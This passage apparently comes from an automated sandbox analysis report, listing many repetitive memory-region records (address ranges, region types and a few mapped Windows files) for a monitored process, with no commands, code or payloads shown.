entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23142 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23143 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23144 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23145 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23146 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23147 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23148 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23149 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23150 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23151 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23152 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23153 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23154 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23155 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23156 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23157 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23158 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23159 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23160 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23161 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23162 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23163 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23164 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23165 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23166 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23167 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23168 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23169 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23170 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23171 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23172 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23173 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23174 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23175 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23176 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23177 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 23178 start_va = 0x26d0000 end_va = 0x26e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 23179 start_va = 0xb4f0000 end_va = 0xb9e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4f0000" filename = "" Region: id = 23180 start_va = 0x570000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23181 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23182 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23183 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23184 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23185 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23186 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23187 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23188 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23189 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23190 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23191 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23192 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23193 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23194 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23195 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23196 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23197 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23198 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23199 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23200 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23201 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23202 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23203 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23204 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23205 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23206 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23207 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23208 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23209 start_va = 0x570000 end_va = 0x572fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 23210 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23211 start_va = 0x7b40000 end_va = 0x7b61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b40000" filename = "" Region: id = 23212 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23213 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23214 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23215 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23216 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23217 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23218 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23219 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23220 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 23221 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23222 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23223 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23224 start_va = 0x106f0000 end_va = 0x1076ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000106f0000" filename = "" Region: id = 23225 start_va = 0x7ff60e360000 end_va = 0x7ff60eb2bfff monitored = 0 entry_point = 0x7ff60e6f9010 region_type = mapped_file name = "ntoskrnl.exe" filename = "\\Windows\\System32\\ntoskrnl.exe" (normalized: "c:\\windows\\system32\\ntoskrnl.exe") Region: id = 23226 start_va = 0x7ffb114c0000 end_va = 0x7ffb11573fff monitored = 0 entry_point = 0x7ffb114d53b0 region_type = mapped_file name = "windows.internal.shell.broker.dll" filename = "\\Windows\\System32\\Windows.Internal.Shell.Broker.dll" (normalized: "c:\\windows\\system32\\windows.internal.shell.broker.dll") Region: id = 23227 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23228 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23229 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23230 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23231 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23232 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23233 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23234 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23235 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23236 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23237 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23238 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23239 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23240 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23241 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23242 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23243 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23244 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23245 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23246 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23247 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23248 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23249 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23250 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23251 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23252 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23253 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23254 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23255 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23256 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23257 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23258 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23259 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23260 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23261 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23262 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23263 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23264 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23265 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23266 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23267 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23268 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23269 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23270 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23271 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23272 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23273 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23274 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23275 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23276 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23277 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23278 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23279 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 23280 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23281 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23282 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 23283 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23284 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23285 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23286 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23287 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23288 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23289 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23290 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23291 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23292 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23293 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23294 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23295 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23296 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23297 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23298 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23299 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23300 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23301 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23302 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23303 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23304 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23305 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23306 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23307 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23308 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23309 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23310 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23311 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23312 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23313 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23314 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23315 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23316 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23317 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23318 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23319 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23320 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23321 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23322 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23323 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23324 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23325 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23326 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23327 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23328 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23329 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23330 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23331 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 23332 start_va = 0x26b0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 23333 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 23334 start_va = 0x540000 end_va = 0x54efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed 